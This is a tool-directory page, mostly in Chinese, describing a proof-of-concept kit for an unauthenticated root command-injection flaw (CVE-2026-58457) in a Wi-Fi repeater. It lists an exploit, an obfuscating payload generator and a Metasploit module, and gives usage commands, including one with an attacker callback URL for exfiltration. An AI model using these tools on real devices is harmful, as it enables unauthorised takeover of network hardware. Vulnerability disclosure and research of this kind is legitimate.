Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-58457 — PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only. | Kitploit
工具/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Exploit FrameworksIoT SecurityPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and Control

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
Learning & Education
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.

查看仓库
21个月前尚未审核

CVE-2026-58457 - 深圳Aitemi M300 Wi-Fi中继器中的未认证操作系统命令注入

[!WARNING] 此代码按“原样”提供,仅用于教育和研究目的。 请勿在生产系统、共享环境或任何未授权目标上使用此 PoC。

  • 运行或托管此代码可能触发杀毒软件检测、安全监控警报,若被滥用还可能引发法律后果。
  • 作者和仓库维护者对此代码造成的任何损害、滥用或非法活动不承担任何责任。
  • 仅在获得适当授权的隔离实验室环境中使用。 仅供防御性研究、漏洞分析和蓝队测试使用。

漏洞摘要

smacfilter_conf 处理程序中存在一个未认证的操作系统命令注入漏洞。name、enable 和 mac GET 参数未经净化即被传入 sprintf() 调用,该调用会构造以 root 身份执行的 UCI 命令。

  • 严重程度:严重(CVSS 9.8)
  • 影响:无需认证即可远程执行 root 命令

包含的工具

  • poc.py - 功能完整的漏洞利用程序,支持 HTTPS、重试、超时和回调数据外传。
  • val.py - 安全、被动式漏洞验证器(使用无害的 id 命令)。
  • gen.py - 采用多种混淆技术的高级载荷生成器。
  • MITIGATIONS.md - 推荐的防御措施。
  • Metasploit 模块 - 位于 exploit/ 目录中。

安装

root@kitploit:~
pip install requests

快速使用

  1. 验证(安全)
root@kitploit:~
python3 val.py --target 192.168.1.100
  1. 漏洞利用(仅限授权测试)
root@kitploit:~
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. 生成混淆载荷
root@kitploit:~
python3 gen.py -c "id" -n 10

Metasploit

  1. 移动模块
root@kitploit:~
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. 重新加载全部
root@kitploit:~
msfconsole -q -x "reload_all"

参考

  • CVE-2026-58457
  • VulnCheck 安全公告
  • GitHub 披露

欢迎 Star 和贡献 - 尤其欢迎绕过技术的改进或更多固件变体的支持。

下载工具